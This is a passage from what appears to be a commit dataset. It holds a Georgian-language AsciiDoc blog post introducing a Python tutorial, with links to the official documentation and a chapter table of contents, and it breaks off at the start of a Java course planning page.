\u10d0\u10e1\u10d4\u10d5\u10d4 \u10d0\u10db\u10d0\u10d5\u10d4 \u10e1\u10d0\u10d8\u10e2\u10d6\u10d4 \u10d2\u10d0\u10d5\u10e0\u10ea\u10d4\u10da\u10d4\u10d1\u10e3\u10da\u10d8\u10d0 \u10e3\u10e4\u10d0\u10e1\u10dd \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10db\u10dd\u10d3\u10e3\u10da\u10d4\u10d1\u10d8, \u10de\u10e0\u10dd\u10d2\u10e0\u10d0\u10db\u10d4\u10d1\u10d8, \u10ee\u10d4\u10da\u10e1\u10d0\u10ec\u10e7\u10dd\u10d4\u10d1\u10d8 \u10d3\u10d0 \u10d3\u10d0\u10db\u10d0\u10d7\u10d4\u10d1\u10d8\u10d7\u10d8 \u10d3\u10dd\u10d9\u10e3\u10db\u10d4\u10dc\u10e2\u10d0\u10ea\u10d8\u10d0.\n\n\u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10de\u10e0\u10d4\u10e2\u10d0\u10e2\u10dd\u10e0\u10e8\u10d8 \u10db\u10d0\u10e0\u10e2\u10d8\u10d5\u10d0\u10d3 \u10d2\u10e0\u10eb\u10d4\u10da\u10d3\u10d4\u10d1\u10d0 \u10d0\u10ee\u10d0\u10da\u10d8 \u10e4\u10e3\u10dc\u10e5\u10ea\u10d8\u10d4\u10d1\u10d8\u10e1 \u10d3\u10d0 \u10db\u10dd\u10dc\u10d0\u10ea\u10d4\u10db\u10d7\u10d0 \u10e2\u10d8\u10de\u10d4\u10d1\u10d8\u10e1 \u10d2\u10d0\u10dc\u10ee\u10dd\u10e0\u10ea\u10d8\u10d4\u10da\u10d4\u10d1\u10d0 C \u10d0\u10dc C++ \u10d6\u10d4 (\u10d0\u10dc \u10e1\u10ee\u10d5\u10d0 \u10d4\u10dc\u10d4\u10d1\u10d6\u10d4 \u10d2\u10d0\u10db\u10dd\u10eb\u10d0\u10ee\u10d4\u10d1\u10e3\u10da\u10d8 C-\u10d3\u10d0\u10dc). \u10de\u10d8\u10d7\u10dd\u10dc\u10d8 \u10d0\u10e0\u10d8\u10e1 \u10d0\u10e1\u10d4\u10d5\u10d4 \u10e8\u10d4\u10e1\u10d0\u10e4\u10d4\u10e0\u10d8\u10e1\u10d8 \u10e0\u10dd\u10d2\u10dd\u10e0\u10ea \u10d2\u10d0\u10e4\u10d0\u10e0\u10d7\u10dd\u10d4\u10d1\u10d8\u10e1 \u10d4\u10dc\u10d0 \u10d0\u10de\u10da\u10d8\u10d9\u10d0\u10ea\u10d8\u10d8\u10e1 \u10d9\u10dd\u10dc\u10e4\u10d8\u10d2\u10e3\u10e0\u10d0\u10ea\u10d8\u10d8\u10e1\u10d7\u10d5\u10d8\u10e1.\n\n\u10d4\u10e1 \u10d2\u10d0\u10d9\u10d5\u10d4\u10d7\u10d8\u10da\u10d8 \u10d0\u10e0\u10d0\u10e4\u10dd\u10e0\u10db\u10d0\u10da\u10e3\u10e0\u10d0\u10d3 \u10ec\u10d0\u10e0\u10e3\u10d3\u10d2\u10d4\u10dc\u10e1 \u10db\u10d9\u10d8\u10d7\u10ee\u10d5\u10d4\u10da\u10e1, \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10eb\u10d8\u10e0\u10d8\u10d7\u10d0\u10d3 \u10ea\u10dc\u10d4\u10d1\u10d4\u10d1\u10e1, \u10d7\u10d5\u10d8\u10e1\u10d4\u10d1\u10d4\u10d1\u10e1 \u10d3\u10d0 \u10e1\u10d8\u10e1\u10e2\u10d4\u10db\u10d0\u10e1. \u10d4\u10e1 \u10ee\u10d4\u10da\u10e1 \u10e3\u10ec\u10e7\u10dd\u10d1\u10e1 \u10e5\u10dd\u10dc\u10d3\u10d4\u10e1 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10de\u10e0\u10d4\u10e2\u10d0\u10e2\u10dd\u10e0\u10e8\u10d8 \u10de\u10e0\u10d0\u10e5\u10e2\u10d8\u10d9\u10e3\u10da\u10d8 \u10d2\u10d0\u10db\u10dd\u10ea\u10d3\u10d8\u10da\u10d4\u10d1\u10d0.\n\n\u10d0\u10db\u10d8\u10e1\u10d7\u10d5\u10d8\u10e1 \u10d0\u10e6\u10ec\u10d4\u10e0\u10d8\u10da\u10d8\u10d0 \u10e1\u10e2\u10d0\u10dc\u10d3\u10d0\u10e0\u10e2\u10e3\u10da\u10d8 \u10dd\u10d1\u10d8\u10d4\u10e5\u10e2\u10d4\u10d1\u10d8 \u10d3\u10d0 \u10db\u10dd\u10d3\u10e3\u10da\u10d4\u10d1\u10d8, \u10d8\u10ee\u10d8\u10da\u10d4\u10d7 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10e1\u10e2\u10d0\u10dc\u10d3\u10d0\u10e0\u10e2\u10e3\u10da\u10d8 \u10d1\u10d8\u10d1\u10da\u10d8\u10dd\u10d7\u10d4\u10d9\u10d0(https:\/\/docs.python.org\/3.5\/library\/index.html#library-index[Python Standard Library]). https:\/\/docs.python.org\/3.5\/reference\/index.html#reference-index[Python Language Reference] \u10d8\u10eb\u10da\u10d4\u10d5\u10d0 \u10e3\u10e4\u10e0\u10dd \u10e4\u10dd\u10e0\u10db\u10d0\u10da\u10e3\u10e0 \u10d2\u10d0\u10dc\u10db\u10d0\u10e0\u10e2\u10d4\u10d1\u10d0\u10e1 \u10d4\u10dc\u10d0\u10d6\u10d4. 
\u10d9\u10dd\u10d3\u10d8\u10e1 \u10d3\u10d0\u10ec\u10d4\u10e0\u10d0 \u10e8\u10d4\u10e1\u10d0\u10eb\u10da\u10d4\u10d1\u10d4\u10da\u10d8\u10d0 C, C++ \u10d6\u10d4, \u10ec\u10d0\u10d8\u10d9\u10d8\u10d7\u10ee\u10d4\u10d7 https:\/\/docs.python.org\/3.5\/extending\/index.html#extending-index[Extending and Embedding the Python Interpreter] \u10d3\u10d0 https:\/\/docs.python.org\/3.5\/c-api\/index.html#c-api-index[Python\/C API Reference Manual.] \u10d0\u10e1\u10d4\u10d5\u10d4 \u10d0\u10e0\u10e1\u10d4\u10d1\u10dd\u10d1\u10e1 \u10e0\u10d0\u10db\u10d3\u10d4\u10dc\u10d8\u10db\u10d4 \u10ec\u10d8\u10d2\u10dc\u10d8, \u10e0\u10dd\u10db\u10d4\u10da\u10d8\u10ea \u10db\u10dd\u10d8\u10ea\u10d0\u10d5\u10e1 \u10de\u10d8\u10d7\u10dd\u10dc\u10e1 \u10e1\u10d8\u10e6\u10e0\u10db\u10d8\u10e1\u10d4\u10e3\u10da\u10d0\u10d3.\n\n\u10e8\u10d4\u10e1\u10d0\u10d5\u10d0\u10da\u10d8:\n\n\t* 1. Whetting Your Appetite\n\t* 2. Using the Python Interpreter\n\t\t**2.1. Invoking the Interpreter\n\t\t\t***2.1.1. Argument Passing\n\t\t\t***2.1.2. Interactive Mode\n\t\t**2.2. The Interpreter and Its Environment\n\t\t\t***2.2.1. Source Code Encoding\n\t* 3. An Informal Introduction to Python\n\t\t**3.1. Using Python as a Calculator\n\t\t\t***3.1.1. Numbers\n\t\t\t***3.1.2. Strings\n\t\t\t***3.1.3. Lists\n\t\t**3.2. First Steps Towards Programming\n\t* 4. More Control Flow Tools\n\t\t**4.1. if Statements\n\t\t**4.2. for Statements\n\t\t**4.3. The range() Function\n\t\t**4.4. break and continue Statements, and else Clauses on Loops\n\t\t**4.5. pass Statements\n\t\t**4.6. Defining Functions\n\t\t**4.7. More on Defining Functions\n\t\t\t***4.7.1. Default Argument Values\n\t\t\t***4.7.2. Keyword Arguments\n\t\t\t***4.7.3. Arbitrary Argument Lists\n\t\t\t***4.7.4. Unpacking Argument Lists\n\t\t\t***4.7.5. Lambda Expressions\n\t\t\t***4.7.6. Documentation Strings\n\t\t\t***4.7.7. Function Annotations\n\t\t**4.8. Intermezzo: Coding Style\n\t* 5. Data Structures\n\t\t**5.1. More on Lists\n\t\t\t***5.1.1. Using Lists as Stacks\n\t\t\t***5.1.2. Using Lists as Queues\n\t\t\t***5.1.3. List Comprehensions\n\t\t\t***5.1.4. Nested List Comprehensions\n\t\t**5.2. The del statement\n\t\t**5.3. Tuples and Sequences\n\t\t**5.4. Sets\n\t\t**5.5. Dictionaries\n\t\t**5.6. Looping Techniques\n\t\t**5.7. More on Conditions\n\t\t**5.8. Comparing Sequences and Other Types\n\t* 6. Modules\n\t\t**6.1. More on Modules\n\t\t**6.1.1. Executing modules as scripts\n\t\t**6.1.2. The Module Search Path\n\t\t**6.1.3. \u201cCompiled\u201d Python files\n\t\t**6.2. Standard Modules\n\t\t**6.3. The dir() Function\n\t\t**6.4. Packages\n\t\t**6.4.1. Importing * From a Package\n\t\t**6.4.2. Intra-package References\n\t\t**6.4.3. Packages in Multiple Directories\n\t* 7. Input and Output\n\t\t**7.1. Fancier Output Formatting\n\t\t**7.1.1. Old string formatting\n\t\t**7.2. Reading and Writing Files\n\t\t**7.2.1. Methods of File Objects\n\t\t**7.2.2. Saving structured data with json\n\t* 8. Errors and Exceptions\n\t\t**8.1. Syntax Errors\n\t\t**8.2. Exceptions\n\t\t**8.3. Handling Exceptions\n\t\t**8.4. Raising Exceptions\n\t\t**8.5. User-defined Exceptions\n\t\t**8.6. Defining Clean-up Actions\n\t\t**8.7. Predefined Clean-up Actions\n\t* 9. Classes\n\t\t**9.1. A Word About Names and Objects\n\t\t**9.2. Python Scopes and Namespaces\n\t\t**9.2.1. Scopes and Namespaces Example\n\t\t**9.3. A First Look at Classes\n\t\t**9.3.1. Class Definition Syntax\n\t\t**9.3.2. Class Objects\n\t\t**9.3.3. Instance Objects\n\t\t**9.3.4. Method Objects\n\t\t**9.3.5. 
Class and Instance Variables\n\t\t**9.4. Random Remarks\n\t\t**9.5. Inheritance\n\t\t**9.5.1. Multiple Inheritance\n\t\t**9.6. Private Variables\n\t\t**9.7. Odds and Ends\n\t\t**9.8. Exceptions Are Classes Too\n\t\t**9.9. Iterators\n\t\t**9.10. Generators\n\t\t**9.11. Generator Expressions\n\t* 10. Brief Tour of the Standard Library\n\t\t**10.1. Operating System Interface\n\t\t**10.2. File Wildcards\n\t\t**10.3. Command Line Arguments\n\t\t**10.4. Error Output Redirection and Program Termination\n\t\t**10.5. String Pattern Matching\n\t\t**10.6. Mathematics\n\t\t**10.7. Internet Access\n\t\t**10.8. Dates and Times\n\t\t**10.9. Data Compression\n\t\t**10.10. Performance Measurement\n\t\t**10.11. Quality Control\n\t\t**10.12. Batteries Included\n\t* 11. Brief Tour of the Standard Library \u2013 Part II\n\t\t**11.1. Output Formatting\n\t\t**11.2. Templating\n\t\t**11.3. Working with Binary Data Record Layouts\n\t\t**11.4. Multi-threading\n\t\t**11.5. Logging\n\t\t**11.6. Weak References\n\t\t**11.7. Tools for Working with Lists\n\t\t**11.8. Decimal Floating Point Arithmetic\n\t* 12. Virtual Environments and Packages\n\t\t**12.1. Introduction\n\t\t**12.2. Creating Virtual Environments\n\t\t**12.3. Managing Packages with pip\n\t* 13. What Now?\n\t* 14. Interactive Input Editing and History Substitution\n\t\t**14.1. Tab Completion and History Editing\n\t\t**14.2. Alternatives to the Interactive Interpreter\n\t* 15. Floating Point Arithmetic: Issues and Limitations\n\t\t**15.1. Representation Error\n\t* 16. Appendix\n\t\t**16.1. Interactive Mode\n\t\t\t***16.1.1. Error Handling\n\t\t\t***16.1.2. Executable Python Scripts\n\t\t\t***16.1.3. The Interactive Startup File\n\t\t\t***16.1.4. The Customization Modules\n\n\n:hp-tags: python[\u10de\u10d8\u10d7\u10dd\u10dc\u10d8],tutorial[\u10d2\u10d0\u10d9\u10d5\u10d4\u10d7\u10d8\u10da\u10d8]","old_contents":"= \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10e1\u10d0\u10ee\u10d4\u10da\u10db\u10eb\u10e6\u10d5\u10d0\u10dc\u10d4\u10da\u10dd - \u10dc\u10d0\u10ec\u10d8\u10da\u10d8 1\n:hp-alt-title: the python tutorial - part 1\n\n\u10de\u10d8\u10d7\u10dd\u10dc\u10d8 \u10d0\u10e0\u10d8\u10e1 \u10d0\u10d3\u10d5\u10d8\u10da\u10d0\u10d3 \u10e1\u10d0\u10e1\u10ec\u10d0\u10d5\u10da\u10d8, \u10eb\u10da\u10d8\u10d4\u10e0\u10d8 \u10de\u10e0\u10dd\u10d2\u10e0\u10d0\u10db\u10d8\u10e0\u10d4\u10d1\u10d8\u10e1 \u10d4\u10dc\u10d0. \u10db\u10d0\u10e1 \u10d0\u10e5\u10d5\u10e1 \u10d4\u10e4\u10d4\u10e5\u10e2\u10e3\u10e0\u10d8 \u10db\u10d0\u10e6\u10d0\u10da\u10d8 \u10d3\u10dd\u10dc\u10d8\u10e1 \u10db\u10dd\u10dc\u10d0\u10ea\u10d4\u10db\u10d7\u10d0 \u10e1\u10e2\u10e0\u10e3\u10e5\u10e2\u10e3\u10e0\u10d4\u10d1\u10d8 \u10d3\u10d0 \u10db\u10d0\u10e0\u10e2\u10d8\u10d5\u10d8, \u10db\u10d0\u10d2\u10e0\u10d0\u10db \u10d4\u10e4\u10d4\u10e5\u10e2\u10e3\u10e0\u10d8 \u10db\u10d8\u10d3\u10d2\u10dd\u10db\u10d0 \u10dd\u10d1\u10d8\u10d4\u10e5\u10e2\u10d6\u10d4 \u10dd\u10e0\u10d8\u10d4\u10dc\u10e2\u10d8\u10e0\u10d4\u10d1\u10e3\u10da\u10d8 \u10de\u10e0\u10dd\u10d2\u10e0\u10d0\u10db\u10d8\u10e0\u10d4\u10d1\u10d8\u10e1(OOP). 
\u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d4\u10da\u10d4\u10d2\u10d0\u10dc\u10e2\u10e3\u10e0\u10d8 \u10e1\u10d8\u10dc\u10e2\u10d0\u10e5\u10e1\u10d8 \u10d3\u10d0 \u10d3\u10d8\u10dc\u10d0\u10db\u10d8\u10e3\u10e0\u10dd\u10d1\u10d0\u10e1\u10d7\u10d0\u10dc \u10d4\u10e0\u10d7\u10d0\u10d3 \u10d8\u10dc\u10e2\u10d4\u10e0\u10de\u10e0\u10d4\u10e2\u10d8\u10e0\u10d4\u10d1\u10e3\u10da\u10d8 \u10d2\u10d0\u10e0\u10d4\u10db\u10dd, \u10e5\u10db\u10dc\u10d8\u10e1 \u10d8\u10d3\u10d4\u10d0\u10da\u10e3\u10e0 \u10d4\u10dc\u10d0\u10e1 \u10e1\u10d9\u10e0\u10d8\u10de\u10e2\u10d8\u10dc\u10d2\u10d8\u10e1\u10d7\u10d5\u10d8\u10e1(scripting) \u10d3\u10d0 \u10e1\u10ec\u10e0\u10d0\u10e4\u10d8 application development-\u10d7\u10d5\u10d8\u10e1 \u10d1\u10d4\u10d5\u10e0 \u10e1\u10e4\u10d4\u10e0\u10dd\u10e8\u10d8 \u10e1\u10d0\u10e3\u10d9\u10d4\u10d7\u10d4\u10e1\u10dd \u10de\u10da\u10d0\u10e2\u10e4\u10dd\u10e0\u10db\u10d4\u10d1\u10d6\u10d4.\n\n\u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10de\u10e0\u10d4\u10e2\u10d0\u10e2\u10dd\u10e0\u10d8 \u10d3\u10d0 \u10db\u10d7\u10da\u10d8\u10d0\u10dc\u10d8 \u10e1\u10e2\u10d0\u10dc\u10d3\u10d0\u10e0\u10e2\u10e3\u10da\u10d8 \u10d1\u10d8\u10d1\u10da\u10d8\u10dd\u10d7\u10d4\u10d9\u10d0 \u10d7\u10d0\u10d5\u10d8\u10e1\u10e3\u10e4\u10da\u10d0\u10d3 \u10ee\u10d4\u10da\u10db\u10d8\u10e1\u10d0\u10ec\u10d5\u10d3\u10dd\u10db\u10d8\u10d0 \u10e0\u10dd\u10d2\u10dd\u10e0\u10ea \u10d9\u10dd\u10d3\u10d8\u10e1 \u10ec\u10e7\u10d0\u10e0\u10dd\u10e1 \u10d0\u10e1\u10d4\u10d5\u10d4 \u10d1\u10d8\u10dc\u10d0\u10e0\u10e3\u10da\u10d8 \u10e4\u10dd\u10e0\u10db\u10d8\u10d7 \u10e7\u10d5\u10d4\u10da\u10d0 \u10eb\u10d8\u10e0\u10d8\u10d7\u10d0\u10d3 \u10de\u10da\u10d0\u10e2\u10e4\u10dd\u10e0\u10db\u10d0\u10d6\u10d4 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10dd\u10e4\u10d8\u10ea\u10d8\u10d0\u10da\u10e3\u10e0\u10d8 \u10d5\u10d4\u10d1 \u10e1\u10d0\u10d8\u10e2\u10d8\u10d3\u10d0\u10dc https:\/\/www.python.org \u10d3\u10d0 \u10e8\u10d4\u10d8\u10eb\u10da\u10d4\u10d1\u10d0 \u10d7\u10d0\u10d5\u10d8\u10e1\u10e3\u10e4\u10da\u10d0\u10d3 \u10d2\u10d0\u10d5\u10e0\u10ea\u10d4\u10da\u10d4\u10d1\u10d0. \u10d0\u10e1\u10d4\u10d5\u10d4 \u10d0\u10db\u10d0\u10d5\u10d4 \u10e1\u10d0\u10d8\u10e2\u10d6\u10d4 \u10d2\u10d0\u10d5\u10e0\u10ea\u10d4\u10da\u10d4\u10d1\u10e3\u10da\u10d8\u10d0 \u10e3\u10e4\u10d0\u10e1\u10dd \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10db\u10dd\u10d3\u10e3\u10da\u10d4\u10d1\u10d8, \u10de\u10e0\u10dd\u10d2\u10e0\u10d0\u10db\u10d4\u10d1\u10d8, \u10ee\u10d4\u10da\u10e1\u10d0\u10ec\u10e7\u10dd\u10d4\u10d1\u10d8 \u10d3\u10d0 \u10d3\u10d0\u10db\u10d0\u10d7\u10d4\u10d1\u10d8\u10d7\u10d8 \u10d3\u10dd\u10d9\u10e3\u10db\u10d4\u10dc\u10e2\u10d0\u10ea\u10d8\u10d0.\n\n\u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10de\u10e0\u10d4\u10e2\u10d0\u10e2\u10dd\u10e0\u10e8\u10d8 \u10db\u10d0\u10e0\u10e2\u10d8\u10d5\u10d0\u10d3 \u10d2\u10e0\u10eb\u10d4\u10da\u10d3\u10d4\u10d1\u10d0 \u10d0\u10ee\u10d0\u10da\u10d8 \u10e4\u10e3\u10dc\u10e5\u10ea\u10d8\u10d4\u10d1\u10d8\u10e1 \u10d3\u10d0 \u10db\u10dd\u10dc\u10d0\u10ea\u10d4\u10db\u10d7\u10d0 \u10e2\u10d8\u10de\u10d4\u10d1\u10d8\u10e1 \u10d2\u10d0\u10dc\u10ee\u10dd\u10e0\u10ea\u10d8\u10d4\u10da\u10d4\u10d1\u10d0 C \u10d0\u10dc C++ \u10d6\u10d4 (\u10d0\u10dc \u10e1\u10ee\u10d5\u10d0 \u10d4\u10dc\u10d4\u10d1\u10d6\u10d4 \u10d2\u10d0\u10db\u10dd\u10eb\u10d0\u10ee\u10d4\u10d1\u10e3\u10da\u10d8 C-\u10d3\u10d0\u10dc). 
\u10de\u10d8\u10d7\u10dd\u10dc\u10d8 \u10d0\u10e0\u10d8\u10e1 \u10d0\u10e1\u10d4\u10d5\u10d4 \u10e8\u10d4\u10e1\u10d0\u10e4\u10d4\u10e0\u10d8\u10e1\u10d8 \u10e0\u10dd\u10d2\u10dd\u10e0\u10ea \u10d2\u10d0\u10e4\u10d0\u10e0\u10d7\u10dd\u10d4\u10d1\u10d8\u10e1 \u10d4\u10dc\u10d0 \u10d0\u10de\u10da\u10d8\u10d9\u10d0\u10ea\u10d8\u10d8\u10e1 \u10d9\u10dd\u10dc\u10e4\u10d8\u10d2\u10e3\u10e0\u10d0\u10ea\u10d8\u10d8\u10e1\u10d7\u10d5\u10d8\u10e1.\n\n\u10d4\u10e1 \u10d2\u10d0\u10d9\u10d5\u10d4\u10d7\u10d8\u10da\u10d8 \u10d0\u10e0\u10d0\u10e4\u10dd\u10e0\u10db\u10d0\u10da\u10e3\u10e0\u10d0\u10d3 \u10ec\u10d0\u10e0\u10e3\u10d3\u10d2\u10d4\u10dc\u10e1 \u10db\u10d9\u10d8\u10d7\u10ee\u10d5\u10d4\u10da\u10e1, \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10eb\u10d8\u10e0\u10d8\u10d7\u10d0\u10d3 \u10ea\u10dc\u10d4\u10d1\u10d4\u10d1\u10e1, \u10d7\u10d5\u10d8\u10e1\u10d4\u10d1\u10d4\u10d1\u10e1 \u10d3\u10d0 \u10e1\u10d8\u10e1\u10e2\u10d4\u10db\u10d0\u10e1. \u10d4\u10e1 \u10ee\u10d4\u10da\u10e1 \u10e3\u10ec\u10e7\u10dd\u10d1\u10e1 \u10e5\u10dd\u10dc\u10d3\u10d4\u10e1 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10de\u10e0\u10d4\u10e2\u10d0\u10e2\u10dd\u10e0\u10e8\u10d8 \u10de\u10e0\u10d0\u10e5\u10e2\u10d8\u10d9\u10e3\u10da\u10d8 \u10d2\u10d0\u10db\u10dd\u10ea\u10d3\u10d8\u10da\u10d4\u10d1\u10d0.\n\n\u10d0\u10db\u10d8\u10e1\u10d7\u10d5\u10d8\u10e1 \u10d0\u10e6\u10ec\u10d4\u10e0\u10d8\u10da\u10d8\u10d0 \u10e1\u10e2\u10d0\u10dc\u10d3\u10d0\u10e0\u10e2\u10e3\u10da\u10d8 \u10dd\u10d1\u10d8\u10d4\u10e5\u10e2\u10d4\u10d1\u10d8 \u10d3\u10d0 \u10db\u10dd\u10d3\u10e3\u10da\u10d4\u10d1\u10d8, \u10d8\u10ee\u10d8\u10da\u10d4\u10d7 \u10de\u10d8\u10d7\u10dd\u10dc\u10d8\u10e1 \u10e1\u10e2\u10d0\u10dc\u10d3\u10d0\u10e0\u10e2\u10e3\u10da\u10d8 \u10d1\u10d8\u10d1\u10da\u10d8\u10dd\u10d7\u10d4\u10d9\u10d0(https:\/\/docs.python.org\/3.5\/library\/index.html#library-index[Python Standard Library]). https:\/\/docs.python.org\/3.5\/reference\/index.html#reference-index[Python Language Reference] \u10d8\u10eb\u10da\u10d4\u10d5\u10d0 \u10e3\u10e4\u10e0\u10dd \u10e4\u10dd\u10e0\u10db\u10d0\u10da\u10e3\u10e0 \u10d2\u10d0\u10dc\u10db\u10d0\u10e0\u10e2\u10d4\u10d1\u10d0\u10e1 \u10d4\u10dc\u10d0\u10d6\u10d4. \u10d9\u10dd\u10d3\u10d8\u10e1 \u10d3\u10d0\u10ec\u10d4\u10e0\u10d0 \u10e8\u10d4\u10e1\u10d0\u10eb\u10da\u10d4\u10d1\u10d4\u10da\u10d8\u10d0 C, C++ \u10d6\u10d4, \u10ec\u10d0\u10d8\u10d9\u10d8\u10d7\u10ee\u10d4\u10d7 https:\/\/docs.python.org\/3.5\/extending\/index.html#extending-index[Extending and Embedding the Python Interpreter] \u10d3\u10d0 https:\/\/docs.python.org\/3.5\/c-api\/index.html#c-api-index[Python\/C API Reference Manual.] \u10d0\u10e1\u10d4\u10d5\u10d4 \u10d0\u10e0\u10e1\u10d4\u10d1\u10dd\u10d1\u10e1 \u10e0\u10d0\u10db\u10d3\u10d4\u10dc\u10d8\u10db\u10d4 \u10ec\u10d8\u10d2\u10dc\u10d8, \u10e0\u10dd\u10db\u10d4\u10da\u10d8\u10ea \u10db\u10dd\u10d8\u10ea\u10d0\u10d5\u10e1 \u10de\u10d8\u10d7\u10dd\u10dc\u10e1 \u10e1\u10d8\u10e6\u10e0\u10db\u10d8\u10e1\u10d4\u10e3\u10da\u10d0\u10d3.\n\n\u10e8\u10d4\u10e1\u10d0\u10d5\u10d0\u10da\u10d8:\n\n\t* 1. Whetting Your Appetite\n\t* 2. Using the Python Interpreter\n\t\t**2.1. Invoking the Interpreter\n\t\t\t***2.1.1. Argument Passing\n\t\t\t***2.1.2. Interactive Mode\n\t\t**2.2. The Interpreter and Its Environment\n\t\t\t***2.2.1. Source Code Encoding\n\t* 3. An Informal Introduction to Python\n\t\t**3.1. Using Python as a Calculator\n\t\t\t***3.1.1. Numbers\n\t\t\t***3.1.2. Strings\n\t\t\t***3.1.3. Lists\n\t\t**3.2. 
First Steps Towards Programming\n\t* 4. More Control Flow Tools\n\t\t**4.1. if Statements\n\t\t**4.2. for Statements\n\t\t**4.3. The range() Function\n\t\t**4.4. break and continue Statements, and else Clauses on Loops\n\t\t**4.5. pass Statements\n\t\t**4.6. Defining Functions\n\t\t**4.7. More on Defining Functions\n\t\t\t***4.7.1. Default Argument Values\n\t\t\t***4.7.2. Keyword Arguments\n\t\t\t***4.7.3. Arbitrary Argument Lists\n\t\t\t***4.7.4. Unpacking Argument Lists\n\t\t\t***4.7.5. Lambda Expressions\n\t\t\t***4.7.6. Documentation Strings\n\t\t\t***4.7.7. Function Annotations\n\t\t**4.8. Intermezzo: Coding Style\n\t* 5. Data Structures\n\t\t**5.1. More on Lists\n\t\t\t***5.1.1. Using Lists as Stacks\n\t\t\t***5.1.2. Using Lists as Queues\n\t\t\t***5.1.3. List Comprehensions\n\t\t\t***5.1.4. Nested List Comprehensions\n\t\t**5.2. The del statement\n\t\t**5.3. Tuples and Sequences\n\t\t**5.4. Sets\n\t\t**5.5. Dictionaries\n\t\t**5.6. Looping Techniques\n\t\t**5.7. More on Conditions\n\t\t**5.8. Comparing Sequences and Other Types\n\t* 6. Modules\n\t\t**6.1. More on Modules\n\t\t**6.1.1. Executing modules as scripts\n\t\t**6.1.2. The Module Search Path\n\t\t**6.1.3. \u201cCompiled\u201d Python files\n\t\t**6.2. Standard Modules\n\t\t**6.3. The dir() Function\n\t\t**6.4. Packages\n\t\t**6.4.1. Importing * From a Package\n\t\t**6.4.2. Intra-package References\n\t\t**6.4.3. Packages in Multiple Directories\n\t* 7. Input and Output\n\t\t**7.1. Fancier Output Formatting\n\t\t**7.1.1. Old string formatting\n\t\t**7.2. Reading and Writing Files\n\t\t**7.2.1. Methods of File Objects\n\t\t**7.2.2. Saving structured data with json\n\t* 8. Errors and Exceptions\n\t\t**8.1. Syntax Errors\n\t\t**8.2. Exceptions\n\t\t**8.3. Handling Exceptions\n\t\t**8.4. Raising Exceptions\n\t\t**8.5. User-defined Exceptions\n\t\t**8.6. Defining Clean-up Actions\n\t\t**8.7. Predefined Clean-up Actions\n\t* 9. Classes\n\t\t**9.1. A Word About Names and Objects\n\t\t**9.2. Python Scopes and Namespaces\n\t\t**9.2.1. Scopes and Namespaces Example\n\t\t**9.3. A First Look at Classes\n\t\t**9.3.1. Class Definition Syntax\n\t\t**9.3.2. Class Objects\n\t\t**9.3.3. Instance Objects\n\t\t**9.3.4. Method Objects\n\t\t**9.3.5. Class and Instance Variables\n\t\t**9.4. Random Remarks\n\t\t**9.5. Inheritance\n\t\t**9.5.1. Multiple Inheritance\n\t\t**9.6. Private Variables\n\t\t**9.7. Odds and Ends\n\t\t**9.8. Exceptions Are Classes Too\n\t\t**9.9. Iterators\n\t\t**9.10. Generators\n\t\t**9.11. Generator Expressions\n\t* 10. Brief Tour of the Standard Library\n\t\t**10.1. Operating System Interface\n\t\t**10.2. File Wildcards\n\t\t**10.3. Command Line Arguments\n\t\t**10.4. Error Output Redirection and Program Termination\n\t\t**10.5. String Pattern Matching\n\t\t**10.6. Mathematics\n\t\t**10.7. Internet Access\n\t\t**10.8. Dates and Times\n\t\t**10.9. Data Compression\n\t\t**10.10. Performance Measurement\n\t\t**10.11. Quality Control\n\t\t**10.12. Batteries Included\n\t* 11. Brief Tour of the Standard Library \u2013 Part II\n\t\t**11.1. Output Formatting\n\t\t**11.2. Templating\n\t\t**11.3. Working with Binary Data Record Layouts\n\t\t**11.4. Multi-threading\n\t\t**11.5. Logging\n\t\t**11.6. Weak References\n\t\t**11.7. Tools for Working with Lists\n\t\t**11.8. Decimal Floating Point Arithmetic\n\t* 12. Virtual Environments and Packages\n\t\t**12.1. Introduction\n\t\t**12.2. Creating Virtual Environments\n\t\t**12.3. Managing Packages with pip\n\t* 13. What Now?\n\t* 14. 
Interactive Input Editing and History Substitution\n\t\t**14.1. Tab Completion and History Editing\n\t\t**14.2. Alternatives to the Interactive Interpreter\n\t* 15. Floating Point Arithmetic: Issues and Limitations\n\t\t**15.1. Representation Error\n\t* 16. Appendix\n\t\t**16.1. Interactive Mode\n\t\t\t***16.1.1. Error Handling\n\t\t\t***16.1.2. Executable Python Scripts\n\t\t\t***16.1.3. The Interactive Startup File\n\t\t\t***16.1.4. The Customization Modules\n\n\n:hp-tags: python[\u10de\u10d8\u10d7\u10dd\u10dc\u10d8],tutorial[\u10d2\u10d0\u10d9\u10d5\u10d4\u10d7\u10d8\u10da\u10d8]","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"0f609b35570eb12b113c96c52952894c0284e136","subject":"Deadline+","message":"Deadline+\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"L3a.adoc","new_file":"L3a.adoc","new_contents":"= Planning\n:toc: preamble\n:sectanchors:\n\/\/works around awesome_bot bug that used to be published at github.com\/dkhamsing\/awesome_bot\/issues\/182.\n:emptyattribute:\n\nThe entry page of the Java course in L3.\n\n== Prerequisites\nYou know algorithmics and, preferably, the basic syntax of Java (or a related language). If you have followed an algorithmics course with illustrations and exercises in Java, you satisfy the prerequisites.\n\n== Abbreviations\n\n* [I]: Important\n* [O]: Optional (do it if you are specifically interested in the related aspect)\n* ESx.y (or ESx.y.z): designates section x.y (or x.y.z) in 